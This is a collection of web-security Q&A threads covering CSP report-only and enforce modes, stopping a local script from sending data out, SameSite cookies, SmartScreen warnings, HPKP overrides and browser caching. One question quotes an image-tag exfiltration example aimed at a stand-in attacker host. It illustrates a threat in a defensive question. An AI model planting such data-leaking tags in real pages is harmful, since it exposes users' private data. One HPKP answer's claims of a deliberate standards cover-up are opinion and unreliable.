I am working on Content Security policy to add to my pages. I am confused between term enforce CSP and CSP report only. what is the difference between those two and how they are useful.
A CSP puts a number of restrictions on sources of content and specific actions. As this has the potential to break a lot of functionality there is also a report only mode, which can be thought of as a test mode. In report only you will get the same browser errors about violations, they are just not enforced and are marked as report-only. For a valid report-only CSP you must define a report-uri to send reports to. Gathering reports from real users for a while will identify problems with your policy before switching to enforce mode. But you will likely also get some false positives due to proxy rewrites, browser extensions, malware etc. Report-only doesn't give any protections and violations will only be visible for users who take a look at dev tools. A strict enforce CSP is essential in protecting your users from a number of web attacks such as XSS and clickjacking.
Related
The background scenario is that I want to give my users a javascript which they can use to analyze their sensitive private data, and I want them to feel safe that this data will not be sent to internet.
Initially, I thought I'll just distribute it as an .html file with embeded <script>, and that they'll just run this .html file in browser over file:/// protocol, which gives some nice same-origin policy defaults.
But, this won't really offer much security to my users: a javascript could easily create an <img src="https://evil.com?sensitive-data=${XYZ}"> tag which would send a GET request to evil.com, despite evil.com being a different origin, because by design embeding of images from different origins is allowed.
Is there some practical way in which I could distribute my javascript and/or for the end user to run such script, so they could be reasonably sure it can't send the data over the internet?
(unpluging the machine from the internet, installing VM, or manipulating firewall settings, are not practical)
(reasonably sure=assumming that the software such us browser they use follows the spec and wasn't hacked)?
Please take a look at Content-Security-Policy subject.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/img-src
Supplementing your html by <meta http-equiv="Content-Security-Policy" content="img-src 'self';"> should disallow browser to make requests to foreign resources.
The alternative attempt could be developing your project in the form of a browser extension, where you can set up content security policy quite precisely, including defines of inline scripting, executing string-to-js methods, frames and fonts origin, and so on ( https://developer.chrome.com/docs/apps/contentSecurityPolicy/ )
As a bonus you (and your users) get a free of charge code review from the security departments of the browsers vendors.
Setting up browser proxy in settings to localhost:DUMMY_PORT looks like safe solution for this case.
Deno is, to cite its website:
Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.
Secure by default. No file, network, or environment access, unless explicitly enabled.
So, this reduces the trust of the user to the trust in deno (and to chocolatey if they want to use choco install deno to install deno).
Beginning with Chrome 80, third party cookies will be blocked unless they have SameSite=None and Secure as attributes. With None as a new value for that attribute. https://blog.chromium.org/2019/10/developers-get-ready-for-new.html
The above blog post states that Firefox and Edge plan on implementing these changes at an undetermined date. And there are is a list of incompatible browsers listed here https://www.chromium.org/updates/same-site/incompatible-clients.
What would be the best practice for handling this situation for cross-browser compatibility?
An initial thought is to use local storage instead of a cookie but there is a concern that a similar change could happen with local storage in the future.
You hit on the good point that as browsers move towards stronger methods of preserving user privacy this changes how sites need to consider handling data. There's definitely a tension between the composable / embeddable nature of the web and the privacy / security concerns of that mixed content. I think this is currently coming to the foreground in the conflict between locking down fingerprinting vectors to prevent user tracking that are often the same signals used by sites to detect fraud. The age old problem that if you have perfect privacy for "good" reasons, that means all the people doing "bad" things (like cycling through a batch of stolen credit cards) also have perfect privacy.
Anyway, outside the ethical dilemmas of all of this I would suggest finding ways to encourage users to have an intentional, first-party relationship with your site / service when you need to track some kind of state related to them. It feels like a generally safe assumption to code as if all storage will be partitioned in the long run and that any form of tracking should be via informed consent. If that's not the direction things go, then I still think you will have created a better experience.
In the short term, there are some options at https://web.dev/samesite-cookie-recipes:
Use two sets of cookies, one with current format headers and one without to catch all browsers.
Sniff the useragent to return appropriate headers to the browser.
You can also maintain a first-party cookie, e.g. SameSite=Lax or SameSite=Strict that you use to refresh the cross-site cookies when the user visits your site in a top-level context. For example, if you provide an embeddable widget that gives personalised content, in the event there are no cookies you can display a message in the widget that links the user to the original site to sign in. That way you're explicitly communicating the value to your user of allowing them to be identified across this site boundary.
For a longer-term view, you can look at proposals like HTTP State Tokens which outlines a single, client-controlled token with an explicit cross-site opt-in. There's also the isLoggedIn proposal which is concerned with providing a way of indicating to the browser that a specific token is used to track the user's session.
My Magento 1.9 webshop is marked as unsafe (phishing which is not true) in Microsoft Edge, if switch to IE and run Smart Screen security check it says all safe.
And strangely only on one of my computers and therefore didn't bother much but also a customer complained about it today.
Anyone experienced this before and have a solution? Is there a way to check why a site is marked as unsafe by smartscreen?
Based on my searching results, Below information may helpful to you.
Q. If I am a website owner, how do I correct a warning on my legitimate site?
A. You can immediately submit a request for a correction. Windows Defender SmartScreen has a built-in, web-based feedback system in place to help customers and website owners report any potential false warnings as quickly as possible. In Windows Internet Explorer, from a red warning, click More information then Report that this site contains no threats. This will take you to a feedback page where you can indicate you are a site owner or representative. Follow the instructions and provide the information on this site to submit a site for review...
Reference:
Resolving “This website has been reported as unsafe” (Windows Defender SmartScreen)
Q.
If I am a website owner, what can I do to help minimize the chance of my website being flagged by Windows Defender SmartScreen?
A.
There are several things you can do that can help minimize the chance of your site being flagged as suspicious. Think of these as best practices or optimal website design ethics.
If you ask users for personal information, use HTTPS with a valid, unexpired server certificate issued by a trusted certification authority.
Make sure that your webpage doesn't expose any cross-site scripting (XSS) vulnerabilities. Protect your site by using anti-cross-site scripting functions such as those provided by the Microsoft Anti-Cross Site Scripting library.
Use the fully-qualified domain name rather than an IP-literal address. (This means a URL should look like "microsoft.com" and not "207.46.19.30.")
Don't encode or tunnel your URLs unnecessarily. If you don't know what this means, you probably aren't doing it.
If you post external or third-party hosted content, make sure that the content is secure and from a known and trusted source.
Reference:
Windows Defender SmartScreen Frequently Asked Questions
In MS Edge browser there's an option to "report file as safe". After clicking it - select the "I'm a website owner" option and fill the false-positive form.
I added HPKP header to my site, but it is not honored by Chrome or Safari. I tested it manually by setting a proxy and by going to chrome://net-internals/#hsts and looking for my domain - which did not found. The HPKP seems correct, and I also tested it using HPKP toolset so I know it is valid.
I am thinking I might be doing something weird with my flow. I have a web app, which is served over myapp.example.com. On login, the app redirects the user to authserver.example.com/begin to initiate OpenID Connect Authorization Code flow. HPKP header is returned only from authserver.example.com/begin, and I think this might be the issue. I have include-subdomain in the HPKP header so I think this is not the issue.
This is the HPKP header (line breaks added for readability):
public-key-pins:max-age=864000;includeSubDomains; \
pin-sha256="bcppaSjDk7AM8C/13vyGOR+EJHDYzv9/liatMm4fLdE="; \
pin-sha256="cJjqBxF88mhfexjIArmQxvZFqWQa45p40n05C6X/rNI="; \
report-uri="https://reporturl.example"
Thanks!
I added HPKP header to my site, but it is not honored by Chrome or Safari... I tested it manually by setting a proxy...
RFC 7469, Public Key Pinning Extension for HTTP, kind of sneaks that past you. The IETF published it with overrides, so an attacker can break a known good pinset. Its mentioned once in the standard by name "override" but the details are not provided. The IETF also failed to publish a discussion in a security considerations section.
More to the point, the proxy you set engaged the override. It does not matter if its the wrong proxy, a proxy certificate installed by an mobile device OEM, or a proxy controlled by an attacker who tricked a user to install it. The web security model and the standard allow it. They embrace interception and consider it a valid use case.
Something else they did was make the reporting of the broken pinset a Must Not or Should Not. It means the user agent is complicit in the coverup, too. That's not discussed in a security considerations section, either. They really don't want folks to know their supposed secure connection is being intercepted.
Your best bet to avoid it is move outside the web security model. Don't use browser based apps when security is a concern. Use a hybrid app and perform the pinning yourself. Your hybrid app can host a WebView Control or View, but still get access to the channel to verify parameters. Also see OWASP's Certificate and Public Key Pinning.
Also see Comments on draft-ietf-websec-key-pinning on the IETF mailing list. One of the suggestions in the comment was change the title to "Public Key Pinning Extension for HTTP with Overrides" to highlight the feature. Not surprisingly, that's not something they want. They are trying to do it surreptitiously without user knowledge.
Here's the relevant text from RFC 6479:
2.7. Interactions with Preloaded Pin Lists
UAs MAY choose to implement additional sources of pinning
information, such as through built-in lists of pinning information.
Such UAs should allow users to override such additional sources,
including disabling them from consideration.
The effective policy for a Known Pinned Host that has both built-in
Pins and Pins from previously observed PKP header response fields is
implementation-defined.
Locally installed CAs (like those used for proxies like you say are running) override any HPKP checks.
This is necessary so as not to completely break the internet given the prevalence of them: anti-virus software and proxies used in large corporations basically MITM https traffic through a locally issued certificate as otherwise they could not read the traffic.
Some argue that locally installing a CA requires access to your machine, and at that point it's game over anyway, but to me this still massively reduces the protection of HPKP and that, coupled with the high risks of using HPKP, means I am really not a fan of it.
What are the complete set of factors that affect image caching in web browsers? How much control does a web developer have over this, and how much is browser settings? Are there different considerations for other types of assets (i.e. scripts, audio)?
Thanks
The complete set of factors:
HTTP headers which affect caching
the user agent's (browser's) built-in caching behavior
may be modified through user settings, depending on UA
including private browsing modes that may use and then clear a separate cache per session
the user's actions, such as manually clearing the cache
Web developers have very little control, but this is fine. Remember that caching is done for the benefit of the end user, usually to reduce page load time, and it's generally infeasible for you to know all the considerations specific to every user.
The bit you can control is expiration time and no-cache behavior. These respectively specify that the user wants to refetch the resource because it is expected to have changed or should not be cached for other reasons.
Browsers may treat images differently than other resources (mainly differing in default expiration time when unspecified), but you can send HTTP headers for any resource.
From the client side, check if the client browser sends If-Modified-Since header to the server. If the client sends the header, IIS will respond 304 Not Modified and hence, the client will use its local cache to display/use the file.
The client settings are responsible for this. IE -> Tools -> Internet Options -> Browsing History -> Settings -> Automatically will ensure that this takes place. Different browsers will have different regions for this setting.
For scripts/audio you can place them in a special folder for content, and simply set content expiration from your server so that the server sends appropriate information to the client to cache the file when it is asked for. This won't be a developer setting though.
The developer setting is typically for the Dynamic files. Based on language [in ASP.NET, OutputCache directive creates different cache headers] this would vary.